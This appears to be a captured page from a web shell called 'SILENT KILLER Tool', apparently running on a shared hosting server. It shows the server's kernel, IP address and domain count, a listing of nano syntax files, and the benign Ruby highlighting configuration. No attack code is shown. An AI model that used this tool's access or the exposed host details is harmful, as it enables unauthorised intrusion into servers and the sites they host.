Current Path: > > usr > share > nano
Operation : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 Software : Apache Server IP : 162.0.232.56 | Your IP: 216.73.216.111 Domains : 1034 Domain(s) Permission : [ 0755 ]
Name | Type | Size | Last Modified | Actions |
---|---|---|---|---|
asm.nanorc | File | 882 bytes | April 10 2018 09:57:51. | |
autoconf.nanorc | File | 555 bytes | April 10 2018 09:57:51. | |
awk.nanorc | File | 1350 bytes | April 10 2018 09:57:51. | |
c.nanorc | File | 1748 bytes | May 27 2018 17:04:47. | |
changelog.nanorc | File | 713 bytes | May 27 2018 17:04:47. | |
cmake.nanorc | File | 825 bytes | April 10 2018 09:57:51. | |
css.nanorc | File | 344 bytes | April 10 2018 09:57:51. | |
debian.nanorc | File | 757 bytes | May 27 2018 17:04:47. | |
default.nanorc | File | 419 bytes | April 10 2018 09:57:51. | |
elisp.nanorc | File | 1109 bytes | April 10 2018 09:57:51. | |
fortran.nanorc | File | 1967 bytes | April 10 2018 09:57:51. | |
gentoo.nanorc | File | 4230 bytes | April 10 2018 09:57:51. | |
go.nanorc | File | 1396 bytes | April 10 2018 09:57:51. | |
groff.nanorc | File | 711 bytes | May 27 2018 17:04:47. | |
guile.nanorc | File | 588 bytes | April 10 2018 09:57:51. | |
html.nanorc | File | 1211 bytes | April 10 2018 09:57:51. | |
java.nanorc | File | 653 bytes | April 10 2018 09:57:51. | |
javascript.nanorc | File | 763 bytes | April 10 2018 09:57:51. | |
json.nanorc | File | 879 bytes | April 10 2018 09:57:51. | |
lua.nanorc | File | 2363 bytes | April 10 2018 09:57:51. | |
makefile.nanorc | File | 535 bytes | June 02 2018 08:20:07. | |
man.nanorc | File | 456 bytes | April 10 2018 09:57:51. | |
mgp.nanorc | File | 229 bytes | April 10 2018 09:57:51. | |
mutt.nanorc | File | 185 bytes | April 10 2018 09:57:51. | |
nanohelp.nanorc | File | 390 bytes | April 10 2018 09:57:51. | |
nanorc.nanorc | File | 2707 bytes | May 10 2018 11:18:29. | |
nftables.nanorc | File | 792 bytes | April 10 2018 09:57:51. | |
objc.nanorc | File | 1800 bytes | April 10 2018 09:57:51. | |
ocaml.nanorc | File | 859 bytes | April 10 2018 09:57:51. | |
patch.nanorc | File | 590 bytes | April 10 2018 09:57:51. | |
perl.nanorc | File | 1466 bytes | April 10 2018 09:57:51. | |
php.nanorc | File | 1070 bytes | April 10 2018 09:57:51. | |
po.nanorc | File | 920 bytes | April 24 2018 15:57:10. | |
postgresql.nanorc | File | 3071 bytes | April 10 2018 09:57:51. | |
pov.nanorc | File | 632 bytes | April 10 2018 09:57:51. | |
python.nanorc | File | 966 bytes | April 10 2018 09:57:51. | |
ruby.nanorc | File | 1517 bytes | April 10 2018 09:57:51. | |
rust.nanorc | File | 1116 bytes | May 27 2018 17:04:47. | |
sh.nanorc | File | 1397 bytes | April 10 2018 09:57:51. | |
spec.nanorc | File | 1925 bytes | May 27 2018 17:04:47. | |
tcl.nanorc | File | 2181 bytes | April 10 2018 09:57:51. | |
tex.nanorc | File | 200 bytes | April 10 2018 09:57:51. | |
texinfo.nanorc | File | 465 bytes | April 10 2018 09:57:51. | |
xml.nanorc | File | 527 bytes | April 10 2018 09:57:51. |
## Here is an example for Ruby. syntax ruby "\.rb$" header "^#!.*ruby[-0-9._]*" magic "Ruby script" linter ruby -w -c comment "#" # Reserved words. color yellow "\<(BEGIN|END|alias|and|begin|break|case|class|def|defined\?|do|else|elsif|end|ensure|false|for|if|in|module)\>" color yellow "\<(next|nil|not|or|redo|rescue|retry|return|self|super|then|true|undef|unless|until|when|while|yield)\>" # Constants. color brightblue "(\$|@|@@)?\<[A-Z]+[0-9A-Z_a-z]*" # Ruby "symbols". icolor magenta "([ ]|^):[0-9A-Z_]+\>" # Some unique things we want to stand out. color brightyellow "\<(__FILE__|__LINE__)\>" # Regular expressions. color brightmagenta "/([^/]|(\\/))*/[iomx]*" "%r\{([^}]|(\\}))*\}[iomx]*" # Shell command expansion is in `backticks` or like %x{this}. These are # "double-quotish" (to use a perlism). color brightblue "`[^`]*`" "%x\{[^}]*\}" # Strings, double-quoted. color green ""([^"]|(\\"))*"" "%[QW]?\{[^}]*\}" "%[QW]?\([^)]*\)" "%[QW]?<[^>]*>" "%[QW]?\[[^]]*\]" "%[QW]?\$[^$]*\$" "%[QW]?\^[^^]*\^" "%[QW]?![^!]*!" # Expression substitution. These go inside double-quoted strings, # "like #{this}". color brightgreen "#\{[^}]*\}" # Strings, single-quoted. color green "'([^']|(\\'))*'" "%[qw]\{[^}]*\}" "%[qw]\([^)]*\)" "%[qw]<[^>]*>" "%[qw]\[[^]]*\]" "%[qw]\$[^$]*\$" "%[qw]\^[^^]*\^" "%[qw]![^!]*!" # Comments. color cyan "#[^{].*$" "#$" color brightcyan "##[^{].*$" "##$" # "Here" docs. color green start="<<-?'?EOT'?" end="^EOT" # Some common markers. color brightcyan "(XXX|TODO|FIXME|\?\?\?)"
SILENT KILLER Tool